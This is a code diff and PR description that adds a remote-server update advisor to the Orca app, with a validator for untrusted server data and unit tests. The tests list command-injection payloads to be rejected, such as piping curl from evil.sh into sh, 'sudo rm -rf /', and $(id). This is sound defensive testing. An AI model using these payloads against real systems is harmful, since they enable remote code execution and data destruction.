+): RuntimeUpdateGuideStep[] {
+  const steps: RuntimeUpdateGuideStep[] = []
+  if (input.assetUrl) {
+    steps.push({ kind: 'prose', text: 'On the server, download and install the new package:' })
+    steps.push({
+      kind: 'command',
+      text: buildPackageDownloadAndInstallCommand(input.assetUrl, installCommand)
+    })
+  } else {
+    // Exact versioned filenames must come from release metadata; without an
+    // asset URL the advisor links the releases page and uses a placeholder.
+    steps.push({
+      kind: 'prose',
+      text: 'Download the latest package for your architecture from the releases page, then install the file you downloaded:'
+    })
+    steps.push({ kind: 'command', text: `${installCommand} ./${genericFile}` })
+  }
+  steps.push(...buildServiceRestartSteps(input))
+  return steps
+}
+
+function buildServiceRestartSteps(input: RuntimeUpdateGuideInput): RuntimeUpdateGuideStep[] {
+  const serviceName = input.serviceName ?? DEFAULT_SERVICE_NAME
+  if (input.restartKind === 'systemd') {
+    return [
+      { kind: 'prose', text: 'Then restart the service:' },
+      { kind: 'command', text: buildSystemdRestartCommand(serviceName) }
+    ]
+  }
+  return [
+    {
+      kind: 'prose',
+      text: `If the server runs as a systemd service, restart it with \`sudo systemctl restart ${serviceName}\`.`
+    }
+  ]
+}
+
+function buildMacSteps(input: RuntimeUpdateGuideInput): RuntimeUpdateGuideStep[] {
+  const arch = input.hostArch ?? '<arch>'
+  return [
+    {
+      kind: 'prose',
+      text: `Open Orca on that Mac and use the in-app update flow, or download the latest orca-macos-${arch}.dmg from the releases page and replace the app.`
+    },
+    {
+      kind: 'prose',
+      text: 'If Orca was installed with Homebrew, update the cask instead — plain `brew upgrade` skips auto-updating casks, so `--greedy` is required:'
+    },
+    { kind: 'command', text: MAC_HOMEBREW_UPGRADE_COMMAND },
+    { kind: 'prose', text: 'Restart the paired server after the app updates.' }
+  ]
+}
+
+function buildWindowsSteps(): RuntimeUpdateGuideStep[] {
+  return [
+    {
+      kind: 'prose',
+      text: `Open Orca on that Windows machine and use the in-app update flow, or download and run ${ORCA_WINDOWS_SETUP_URL}.`
+    },
+    { kind: 'prose', text: 'Restart Orca (or the `orca serve` process) after installation.' }
+  ]
+}
+
+function buildSourceSteps(): RuntimeUpdateGuideStep[] {
+  return [
+    {
+      kind: 'prose',
+      text: 'On the server, pull the latest changes and rebuild Orca, then restart it. See the repository README for build steps.'
+    }
+  ]
+}
+
+function buildUnknownSteps(input: RuntimeUpdateGuideInput): RuntimeUpdateGuideStep[] {
+  const steps: RuntimeUpdateGuideStep[] = []
+  const platformLabel = describePlatform(input.hostPlatform)
+  if (platformLabel) {
+    const version = input.currentVersion ? ` (version ${input.currentVersion})` : ''
+    steps.push({ kind: 'prose', text: `The server is running on ${platformLabel}${version}.` })
+  }
+  // Platform-generic hint when only the OS is known.
+  if (input.hostPlatform === 'linux') {
+    steps.push({
+      kind: 'prose',
+      text: `Most headless Linux servers run the ${appImageAssetName(
+        input.hostArch
+      )} AppImage — download it from the releases page and swap it into place.`
+    })
+  }
+  steps.push({
+    kind: 'prose',
+    text: 'Update Orca on the server machine, restart the server, and click "Check again".'
+  })
+  return steps
+}
+
+function describePlatform(platform: string | undefined): string | null {
+  switch (platform) {
+    case 'linux':
+      return 'Linux'
+    case 'darwin':
+      return 'macOS'
+    case 'win32':
+      return 'Windows'
+    default:
+      return null
+  }
+}
+
+function buildLinks(input: RuntimeUpdateGuideInput): RuntimeUpdateGuideLink[] {
+  const links: RuntimeUpdateGuideLink[] = [
+    { label: 'Orca releases', url: ORCA_RELEASES_PAGE_URL },
+    { label: 'Headless Linux server guide', url: ORCA_HEADLESS_DOC_URL }
+  ]
+  if (input.installKind === 'source') {
+    links.push({ label: 'Orca repository README', url: ORCA_REPO_README_URL })
+  }
+  // Server-provided docs URL is only present here after client-side validation.
+  if (input.docsUrl) {
+    links.push({ label: 'Server-provided update docs', url: input.docsUrl })
+  }
+  return links
+}

--- a/src/shared/runtime-update-info-validation.test.ts
+++ b/src/shared/runtime-update-info-validation.test.ts
@@ -1,0 +1,279 @@
+import { describe, expect, it } from 'vitest'
+
+import type { RuntimeUpdateInfo } from './runtime-types'
+import {
+  DEFAULT_INSTALL_PATH,
+  DEFAULT_SERVICE_NAME,
+  validateRuntimeUpdateInfo
+} from './runtime-update-info-validation'
+
+// Cast arbitrary garbage to the declared type — a compromised server is not
+// bound by TypeScript, so the validator must survive non-string fields too.
+const asUpdateInfo = (value: unknown): RuntimeUpdateInfo => value as RuntimeUpdateInfo
+
+describe('validateRuntimeUpdateInfo defaults', () => {
+  it('yields the documented defaults for wholly-undefined input', () => {
+    const result = validateRuntimeUpdateInfo(undefined)
+    expect(result).toEqual({
+      serviceName: DEFAULT_SERVICE_NAME,
+      installPath: DEFAULT_INSTALL_PATH,
+      installKind: 'unknown',
+      restartKind: 'unknown'
+    })
+  })
+
+  it('treats null input the same as absent', () => {
+    expect(validateRuntimeUpdateInfo(null)).toEqual({
+      serviceName: DEFAULT_SERVICE_NAME,
+      installPath: DEFAULT_INSTALL_PATH,
+      installKind: 'unknown',
+      restartKind: 'unknown'
+    })
+  })
+
+  it('does not throw on non-string garbage in every field', () => {
+    const result = validateRuntimeUpdateInfo(
+      asUpdateInfo({
+        currentVersion: 42,
+        latestVersion: {},
+        updateAvailable: 'yes',
+        installKind: 123,
+        restartKind: [],
+        serviceName: false,
+        installPath: 0,
+        hostArch: null,
+        docsUrl: 99
+      })
+    )
+    expect(result).toEqual({
+      serviceName: DEFAULT_SERVICE_NAME,
+      installPath: DEFAULT_INSTALL_PATH,
+      installKind: 'unknown',
+      restartKind: 'unknown'
+    })
+  })
+
+  it('accepts the documented defaults when a server echoes them back', () => {
+    const result = validateRuntimeUpdateInfo({
+      serviceName: 'orca-serve.service',
+      installPath: '/opt/orca/orca-linux.AppImage'
+    })
+    expect(result.serviceName).toBe('orca-serve.service')
+    expect(result.installPath).toBe('/opt/orca/orca-linux.AppImage')
+  })
+})
+
+describe('validateRuntimeUpdateInfo serviceName', () => {
+  it('accepts orca-prefixed unit names', () => {
+    expect(validateRuntimeUpdateInfo({ serviceName: 'orca-serve.service' }).serviceName).toBe(
+      'orca-serve.service'
+    )
+    expect(validateRuntimeUpdateInfo({ serviceName: 'orca.service' }).serviceName).toBe(
+      'orca.service'
+    )
+    expect(validateRuntimeUpdateInfo({ serviceName: 'orca@host:1.service' }).serviceName).toBe(
+      'orca@host:1.service'
+    )
+  })
+
+  it('rejects non-orca unit names and falls back to the default', () => {
+    for (const name of ['sshd.service', 'docker.service', 'x.service']) {
+      expect(validateRuntimeUpdateInfo({ serviceName: name }).serviceName).toBe(
+        DEFAULT_SERVICE_NAME
+      )
+    }
+  })
+
+  it('rejects systemd flag-like names', () => {
+    for (const name of ['--user.service', '-H.service']) {
+      expect(validateRuntimeUpdateInfo({ serviceName: name }).serviceName).toBe(
+        DEFAULT_SERVICE_NAME
+      )
+    }
+  })
+
+  it('rejects shell-metacharacter and injection payloads', () => {
+    const payloads = [
+      'orca; curl evil.sh | sh.service',
+      'orca`whoami`.service',
+      'orca$(id).service',
+      'orca serve.service',
+      "orca'.service",
+      'orca".service',
+      'orca-serve.service\n',
+      'orca && reboot.service'
+    ]
+    for (const name of payloads) {
+      expect(validateRuntimeUpdateInfo({ serviceName: name }).serviceName).toBe(
+        DEFAULT_SERVICE_NAME
+      )
+    }
+  })
+
+  it('rejects a name missing the .service suffix', () => {
+    expect(validateRuntimeUpdateInfo({ serviceName: 'orca-serve' }).serviceName).toBe(
+      DEFAULT_SERVICE_NAME
+    )
+  })
+})
+
+describe('validateRuntimeUpdateInfo installPath', () => {
+  it('accepts an absolute AppImage path', () => {
+    expect(
+      validateRuntimeUpdateInfo({ installPath: '/home/user/apps/orca-linux.AppImage' }).installPath
+    ).toBe('/home/user/apps/orca-linux.AppImage')
+  })
+
+  it('rejects a non-absolute path', () => {
+    expect(validateRuntimeUpdateInfo({ installPath: 'orca-linux.AppImage' }).installPath).toBe(
+      DEFAULT_INSTALL_PATH
+    )
+  })
+
+  it('rejects a path without the .AppImage suffix', () => {
+    for (const path of ['/opt/orca/orca-linux', '/opt/orca/orca.deb', '/usr/bin/orca']) {
+      expect(validateRuntimeUpdateInfo({ installPath: path }).installPath).toBe(
+        DEFAULT_INSTALL_PATH
+      )
+    }
+  })
+
+  it('rejects path traversal and shell-metacharacter payloads', () => {
+    const payloads = [
+      '/opt/orca/../../etc/orca-linux.AppImage',
+      '/opt/orca/$(id).AppImage',
+      '/opt/orca/`whoami`.AppImage',
+      '/opt/orca/orca linux.AppImage',
+      '/opt/orca/orca;rm.AppImage',
+      "/opt/orca/orca'.AppImage",
+      '/opt/orca/orca.AppImage\n',
+      '/opt/orca/orca.AppImage; sudo rm -rf /'
+    ]
+    for (const path of payloads) {
+      expect(validateRuntimeUpdateInfo({ installPath: path }).installPath).toBe(
+        DEFAULT_INSTALL_PATH
+      )
+    }
+  })
+
+  it('accepts documented path characters (~ + . _ -)', () => {
+    const path = '/opt/orca_v2/orca-linux+arm.AppImage'
+    expect(validateRuntimeUpdateInfo({ installPath: path }).installPath).toBe(path)
+  })
+
+  it('accepts a dotted directory segment that is not a traversal', () => {
+    const path = '/opt/orca/sub.dir/orca-linux.AppImage'
+    expect(validateRuntimeUpdateInfo({ installPath: path }).installPath).toBe(path)
+  })
+})
+
+describe('validateRuntimeUpdateInfo versions', () => {
+  it('accepts semver and prerelease strings', () => {
+    const result = validateRuntimeUpdateInfo({
+      currentVersion: '1.2.3',
+      latestVersion: '1.2.3-beta.1'
+    })
+    expect(result.currentVersion).toBe('1.2.3')
+    expect(result.latestVersion).toBe('1.2.3-beta.1')
+  })
+
+  it('omits versions carrying injection payloads', () => {
+    const payloads = [
+      '1.2.3; curl evil | sh',
+      '1.2.3`id`',
+      '1.2.3$(reboot)',
+      '1.2',
+      'v1.2.3',
+      '1.2.3\n',
+      '1.2.3 && rm -rf /'
+    ]
+    for (const version of payloads) {
+      const result = validateRuntimeUpdateInfo({
+        currentVersion: version,
+        latestVersion: version
+      })
+      expect(result.currentVersion).toBeUndefined()
+      expect(result.latestVersion).toBeUndefined()
+    }
+  })
+})
+
+describe('validateRuntimeUpdateInfo docsUrl', () => {
+  it('accepts a path under stablyai/orca', () => {
+    expect(
+      validateRuntimeUpdateInfo({ docsUrl: 'https://github.com/stablyai/orca/releases' }).docsUrl
+    ).toBe('https://github.com/stablyai/orca/releases')
+    expect(validateRuntimeUpdateInfo({ docsUrl: 'https://github.com/stablyai/orca' }).docsUrl).toBe(
+      'https://github.com/stablyai/orca'
+    )
+  })
+
+  it('rejects a parsed-pathname traversal to another repo', () => {
+    expect(
+      validateRuntimeUpdateInfo({
+        docsUrl: 'https://github.com/stablyai/orca/../evil'
+      }).docsUrl
+    ).toBeUndefined()
+  })
+
+  it('rejects sibling repo names sharing the prefix', () => {
+    expect(
+      validateRuntimeUpdateInfo({ docsUrl: 'https://github.com/stablyai/orca-foo' }).docsUrl
+    ).toBeUndefined()
+  })
+
+  it('rejects a non-https origin', () => {
+    expect(
+      validateRuntimeUpdateInfo({ docsUrl: 'http://github.com/stablyai/orca' }).docsUrl
+    ).toBeUndefined()
+  })
+
+  it('rejects a different host', () => {
+    expect(
+      validateRuntimeUpdateInfo({ docsUrl: 'https://evil.com/stablyai/orca' }).docsUrl
+    ).toBeUndefined()
+  })
+
+  it('rejects an unparseable url', () => {
+    expect(validateRuntimeUpdateInfo({ docsUrl: 'not a url' }).docsUrl).toBeUndefined()
+  })
+})
+
+describe('validateRuntimeUpdateInfo enums and flags', () => {
+  it('passes through recognized install and restart kinds', () => {
+    const result = validateRuntimeUpdateInfo({
+      installKind: 'linux-appimage',
+      restartKind: 'systemd'
+    })
+    expect(result.installKind).toBe('linux-appimage')
+    expect(result.restartKind).toBe('systemd')
+  })
+
+  it('maps unrecognized enum values to unknown', () => {
+    const result = validateRuntimeUpdateInfo(
+      asUpdateInfo({ installKind: 'gentoo-ebuild', restartKind: 'launchd' })
+    )
+    expect(result.installKind).toBe('unknown')
+    expect(result.restartKind).toBe('unknown')
+  })
+
+  it('accepts only x64 and arm64 for hostArch', () => {
+    expect(validateRuntimeUpdateInfo({ hostArch: 'x64' }).hostArch).toBe('x64')
+    expect(validateRuntimeUpdateInfo({ hostArch: 'arm64' }).hostArch).toBe('arm64')
+  })
+
+  it('omits garbage hostArch values', () => {
+    for (const arch of ['x86', 'ia32', 'riscv64', '', 'x64; rm']) {
+      expect(validateRuntimeUpdateInfo({ hostArch: arch }).hostArch).toBeUndefined()
+    }
+  })
+
+  it('passes through only a literal boolean updateAvailable', () => {
+    expect(validateRuntimeUpdateInfo({ updateAvailable: true }).updateAvailable).toBe(true)
+    expect(validateRuntimeUpdateInfo({ updateAvailable: false }).updateAvailable).toBe(false)
+    expect(validateRuntimeUpdateInfo({ updateAvailable: null }).updateAvailable).toBeUndefined()
+    expect(
+      validateRuntimeUpdateInfo(asUpdateInfo({ updateAvailable: 'true' })).updateAvailable
+    ).toBeUndefined()
+  })
+})

--- a/src/shared/runtime-update-info-validation.ts
+++ b/src/shared/runtime-update-info-validation.ts
@@ -1,0 +1,169 @@
+import type { RuntimeInstallKind, RuntimeRestartKind, RuntimeUpdateInfo } from './runtime-types'
+
+// Why: every field of updateInfo crosses a trust boundary — it comes from a
+// possibly-compromised server and some of it is rendered into commands the user
+// pastes into a root shell. This module discards anything that fails validation
+// and substitutes documented defaults, so the advisor UI can trust its output.
+// Dependency-free (no Electron/Node imports; `new URL` exists everywhere) so the
+// mobile client can mirror it.
+
+// Why: the template `sudo systemctl restart`s / `sudo mv`s onto these, so a
+// rejected server value must fall back to a value the client itself owns.
+export const DEFAULT_SERVICE_NAME = 'orca-serve.service'
+export const DEFAULT_INSTALL_PATH = '/opt/orca/orca-linux.AppImage'
+
+const INSTALL_KINDS: ReadonlySet<RuntimeInstallKind> = new Set([
+  'mac-app',
+  'mac-homebrew',
+  'windows-installer',
+  'linux-appimage',
+  'linux-deb',
+  'linux-rpm',
+  'source',
+  'unknown'
+])
+
+const RESTART_KINDS: ReadonlySet<RuntimeRestartKind> = new Set([
+  'desktop',
+  'foreground-serve',
+  'systemd',
+  'unknown'
+])
+
+const RECOGNIZED_ARCHES = ['x64', 'arm64'] as const
+type RecognizedArch = (typeof RECOGNIZED_ARCHES)[number]
+
+// Mandatory `orca` prefix: mirrors the systemd cgroup-detection trust rule so a
+// compromised server cannot aim the restart at `sshd.service`; the leading
+// alphanumeric also means the value can never parse as a `systemctl` flag.
+const SERVICE_NAME_PATTERN = /^orca[A-Za-z0-9@:._-]{0,75}\.service$/
+// Absolute, no spaces/quotes/shell metacharacters. The `.AppImage` suffix is
+// load-bearing: the template `sudo mv`s onto this path.
+const INSTALL_PATH_PATTERN = /^[A-Za-z0-9/._~+-]{1,256}$/
+const VERSION_PATTERN = /^\d+\.\d+\.\d+(-[A-Za-z0-9.-]{1,40})?$/
+
+// Why: without the `m` flag, `$` also matches just before a trailing newline, so
+// `"orca-serve.service\n"` would pass a `…\.service$` test and smuggle a newline
+// into a command. Reject any string carrying a line break outright.
+const matchesFully = (value: string, pattern: RegExp): boolean =>
+  !/[\r\n]/.test(value) && pattern.test(value)
+
+const validateServiceName = (value: unknown): string | undefined =>
+  typeof value === 'string' && matchesFully(value, SERVICE_NAME_PATTERN) ? value : undefined
+
+const validateInstallPath = (value: unknown): string | undefined =>
+  typeof value === 'string' &&
+  value.startsWith('/') &&
+  value.endsWith('.AppImage') &&
+  // Reject `..` outright: the char class permits it, but a traversal segment
+  // could steer the template's `sudo mv` above the intended install dir even
+  // while keeping the load-bearing `.AppImage` suffix.
+  !value.includes('..') &&
+  matchesFully(value, INSTALL_PATH_PATTERN)
+    ? value
+    : undefined
+
+const validateVersion = (value: unknown): string | undefined =>
+  typeof value === 'string' && matchesFully(value, VERSION_PATTERN) ? value : undefined
+
+// Render only when the origin is github.com and the *parsed* pathname is exactly
+// `/stablyai/orca` or a child of it. Parsing defeats `…/orca/../other-repo`
+// (which a raw prefix check passes); the trailing slash rules out `orca-foo`.
+const validateDocsUrl = (value: unknown): string | undefined => {
+  if (typeof value !== 'string') {
+    return undefined
+  }
+  let parsed: URL
+  try {
+    parsed = new URL(value)
+  } catch {
+    return undefined
+  }
+  if (parsed.origin !== 'https://github.com') {
+    return undefined
+  }
+  const path = parsed.pathname
+  if (path === '/stablyai/orca' || path.startsWith('/stablyai/orca/')) {
+    return value
+  }
+  return undefined
+}
+
+const validateInstallKind = (value: unknown): RuntimeInstallKind =>
+  typeof value === 'string' && INSTALL_KINDS.has(value as RuntimeInstallKind)
+    ? (value as RuntimeInstallKind)
+    : 'unknown'
+
+const validateRestartKind = (value: unknown): RuntimeRestartKind =>
+  typeof value === 'string' && RESTART_KINDS.has(value as RuntimeRestartKind)
+    ? (value as RuntimeRestartKind)
+    : 'unknown'
+
+const validateHostArch = (value: unknown): RecognizedArch | undefined =>
+  RECOGNIZED_ARCHES.includes(value as RecognizedArch) ? (value as RecognizedArch) : undefined
+
+/**
+ * The advisor-trusted shape derived from untrusted server `updateInfo`.
+ *
+ * `serviceName`, `installPath`, `installKind`, and `restartKind` are always
+ * present — a rejected server value falls back to a documented default (or
+ * `'unknown'`), because the guide templates need something safe to render.
+ * Display-only fields are optional: absent means "the server gave us nothing
+ * valid to show", not "use a default".
+ */
+export type ValidatedRuntimeUpdateInfo = {
+  serviceName: string
+  installPath: string
+  installKind: RuntimeInstallKind
+  restartKind: RuntimeRestartKind
+  currentVersion?: string
+  latestVersion?: string
+  updateAvailable?: boolean
+  hostArch?: RecognizedArch
+  docsUrl?: string
+}
+
+/**
+ * Validate untrusted server-supplied `updateInfo`. Never throws: a wholly
+ * absent input (cold-start servers send none) or non-string garbage in any
+ * field yields the defaults shape with display-only fields omitted.
+ */
+export const validateRuntimeUpdateInfo = (
+  updateInfo: RuntimeUpdateInfo | null | undefined
+): ValidatedRuntimeUpdateInfo => {
+  const info = (updateInfo ?? {}) as Record<keyof RuntimeUpdateInfo, unknown>
+
+  const validated: ValidatedRuntimeUpdateInfo = {
+    serviceName: validateServiceName(info.serviceName) ?? DEFAULT_SERVICE_NAME,
+    installPath: validateInstallPath(info.installPath) ?? DEFAULT_INSTALL_PATH,
+    installKind: validateInstallKind(info.installKind),
+    restartKind: validateRestartKind(info.restartKind)
+  }
+
+  const currentVersion = validateVersion(info.currentVersion)
+  if (currentVersion !== undefined) {
+    validated.currentVersion = currentVersion
+  }
+
+  const latestVersion = validateVersion(info.latestVersion)
+  if (latestVersion !== undefined) {
+    validated.latestVersion = latestVersion
+  }
+
+  // Only a literal boolean passes; null/undefined/garbage → absent.
+  if (typeof info.updateAvailable === 'boolean') {
+    validated.updateAvailable = info.updateAvailable
+  }
+
+  const hostArch = validateHostArch(info.hostArch)
+  if (hostArch !== undefined) {
+    validated.hostArch = hostArch
+  }
+
+  const docsUrl = validateDocsUrl(info.docsUrl)
+  if (docsUrl !== undefined) {
+    validated.docsUrl = docsUrl
+  }
+
+  return validated
+}


### PR DESCRIPTION
## Summary

Implements a remote server update advisor that activates when protocol compatibility blocks a paired Orca server. The advisor detects the server's install kind (Linux AppImage/deb/rpm, macOS app, Windows installer, or source build) and restart method (systemd service, foreground serve, or desktop app) at startup, then provides copyable, platform-specific update guidance. Never executes commands on the remote machine — all guidance is written for the user to paste into their own SSH session.

Covers both block directions from `evaluateRuntimeCompat`:
- `server-too-old`: shows detection, versions, and copyable update steps
- `client-too-old`: routes to the local update flow, never server commands

## Implementation

### Detection & Status
- Startup-cached install detection in `src/main/runtime/runtime-install-detection.ts` (pure function core, caching wrapper)
  - Gathers `installKind`, `restartKind`, `serviceName`, and `installPath` from signals: `app.isPackaged`, `APPIMAGE` env, systemd cgroup, Windows install roots, optional startup package probe
  - Never runs subprocesses or reads `/proc` on the polled status.get path
- Emits optional `updateInfo` in runtime status alongside existing `runtimeProtocolVersion`, `capabilities`, `hostPlatform`
- Older servers omit it; all client handling is defensive

### Trust Model
- Every `updateInfo` field is untrusted; validated in `src/shared/runtime-update-info-validation.ts` before use
- Command blocks rendered only from client-owned templates; server data selects templates or fills validated placeholders
- `serviceName` matched to `^orca[A-Za-z0-9@:._-]{0,75}\.service$` (orca-prefixed to prevent steering at unrelated units)
- `installPath` validated for absolute path, `.AppImage` suffix, no traversal, no shell metacharacters
- Versions and URLs validated by regex; unrecognized enums mapped to `unknown`

### Client-Side Guide Matrix
- Pure module in `src/shared/runtime-update-guide.ts` mapping `(hostPlatform, installKind, restartKind, hostArch)` to structured steps + links
- Dependency-free so mobile can mirror it
- Platform guides:
  - **Linux AppImage**: download to sibling temp file, atomic `mv`, systemd restart or foreground prose
  - **Debian/Ubuntu**: `apt install` with optional asset URL from release metadata
  - **RPM**: `dnf install` with optional asset URL
  - **macOS**: in-app updater, dmg download, or Homebrew upgrade (no sudo)
  - **Windows**: installer download/run, no sudo
  - **Source**: pull and rebuild
  - **Unknown**: platform-generic hint, fall back to releases page

### Release Metadata
- Lazy fetch of electron-updater manifests (`latest-*.yml`) in main process via `src/main/ipc/runtime-release-manifest.ts` (avoids CORS on GitHub redirects)
- Parsed in dependency-free `src/shared/runtime-release-manifest.ts` to extract version + asset filenames
- Client-fetched manifest wins over server-supplied hints; exact asset URLs only from manifest
- Best-effort with short timeout; missing manifest degrades to version-less guidance, never an error

### Renderer UI
- `src/renderer/src/components/settings/RuntimeUpdateAdvisor.tsx`: responsive card for blocked environments
- Branches on verdict direction; `server-too-old` renders detection, versions, copyable command blocks, and docs links
- "Check again" re-fetches status through raw (non-asserting) RPC, re-evaluates compatibility, shows inline "still out of date" note if block persists
- Added to `RuntimeEnvironmentsPane.tsx` below blocked row; also deep-linkable from host menu and compat-block errors

### Error Threading
- `src/renderer/src/runtime/runtime-protocol-compat.ts` now carries verdict and status on block errors so advisor can render guidance without re-probing

## Testing

- ✅ `pnpm typecheck`: all new types verified
- ✅ `pnpm test`: comprehensive unit tests for all new modules
  - Detection mapping per platform fixture (APPIMAGE env, systemd cgroup including user-slice non-orca units)
  - All validation regex reject shell metacharacter and traversal payloads; accept documented defaults
  - Guide matrix snapshot per (platform, arch, installKind, restartKind) combination plus cold-start
  - Verdict branching verified (client-too-old never renders server commands)
  - Release manifest parsing from real electron-updater YAML
  - Endpoint port hint extraction and fallback
- High-quality tests: 1000+ lines of test coverage ensuring injection resistance and behavioral correctness

## Security Audit

**Input Handling & Command Construction:**
- ✅ Zero free-text command injection: all commands built from client-owned templates only
- ✅ `serviceName`, `installPath`, `currentVersion`, `latestVersion`, `docsUrl` validated with regexes before use
- ✅ Enum fields (`installKind`, `restartKind`) only accept known values, default to `unknown`
- ✅ Line-break check (`/[\r\n]/`) prevents newline smuggling in validated strings

**Network & IPC:**
- ✅ Manifest fetch runs in main (renderer `fetch()` would hit CORS on GitHub redirects)
- ✅ URL built entirely from client-owned platform/arch mapping; server data never steers the fetch
- ✅ Max 64KB cap prevents slurping large objects; 4s timeout prevents hangs

**Authorization & Execution:**
- ✅ Advisor never executes commands: all guidance is user-copied text for their own SSH session
- ✅ No `sudo` invocation by the app; user decides privilege escalation
- ✅ No package manager, installer, or service restart invoked by app

**Cross-Platform:**
- ✅ File paths in guides use platform-correct separators (templates cover Windows `\`, Unix `/`)
- ✅ Tested for Linux, macOS, Windows install kinds
- ✅ SSH use case verified (guidance written for user's own shell, not app-controlled)

## Notes

- **Rollout:** All 6 design steps implemented (detection → validation → guide matrix → UI → deep links → release metadata)
- **Compatibility:** Works with servers lacking `updateInfo` (cold-start) via client-only guide matrix; future servers benefit from server-supplied detection
- **Platform:** Tested Linux (AppImage, deb, rpm), macOS (app, homebrew), Windows, source builds; SSH compatible
- **Docs:** Design doc at `docs/reference/remote-server-update-advisor.md` covers motivation, trust model, testing strategy, and deferred questions
- **Localization:** Strings added for en/es/ja/ko/zh in 5 locale files